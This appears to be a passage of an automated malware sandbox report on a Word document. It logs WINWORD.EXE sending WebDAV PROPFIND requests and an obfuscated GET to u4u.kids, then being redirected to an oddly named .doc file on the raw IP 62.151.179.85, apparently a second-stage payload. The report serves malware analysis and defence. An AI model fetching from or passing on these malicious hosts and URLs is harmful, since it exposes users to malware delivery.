                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Allow: GET,HEAD
                ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                2024-10-23 15:50:12 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                Data Ascii: GET,HEAD


                Session IDSource IPSource PortDestination IPDestination Port
                3192.168.2.224916724.199.88.84443
                TimestampBytes transferredDirectionData
                2024-10-23 15:50:13 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: u4u.kids
                2024-10-23 15:50:13 UTC435INHTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:13 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 144
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Content-Security-Policy: default-src 'none'
                2024-10-23 15:50:13 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                Session IDSource IPSource PortDestination IPDestination Port
                4192.168.2.224916824.199.88.84443
                TimestampBytes transferredDirectionData
                2024-10-23 15:50:14 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: u4u.kids
                2024-10-23 15:50:14 UTC435INHTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:14 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 144
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Content-Security-Policy: default-src 'none'
                2024-10-23 15:50:14 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.224916924.199.88.844433312C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                2024-10-23 15:50:15 UTC461OUTGET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                Host: u4u.kids
                Connection: Keep-Alive
                2024-10-23 15:50:15 UTC599INHTTP/1.1 302 Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:15 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 220
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 0
                Location: http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc
                Vary: Accept
                2024-10-23 15:50:15 UTC220INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 36 32 2e 31 35 31 2e 31 37 39 2e 38 35 2f 32 30 32 2f 6d 65 6e 2f 6d 65 2f 77 65 67 76 65 6e 62 65 73 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 74 68 69 6e 67 73 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 67 6f 6f 64 70 65 72 73 6f 6e 77 69 74 68 67 72 65 61 74 63 6f 6f 6b 69 65 73 77 69 74 68 6e 69 63 65 77 6f 72 6b 69 6e 67 70 69 6c 6c 77 69 74 68 67 6e 69 63 65 5f 5f 5f 5f 5f 5f 5f 5f 5f 77 65 61 72 65 67 6f 6f 64 66 6f 72 6e 69 63 65 77 6f 72 6b 69 6e 67 74 68 69 6e 67 73 74 6f 62 65 69 6e 2e 64 6f 63
                Data Ascii: Found. Redirecting to http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:11:50:02
                Start date:23/10/2024
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Imagebase:0x13f250000
                File size:1'423'704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                No disassembly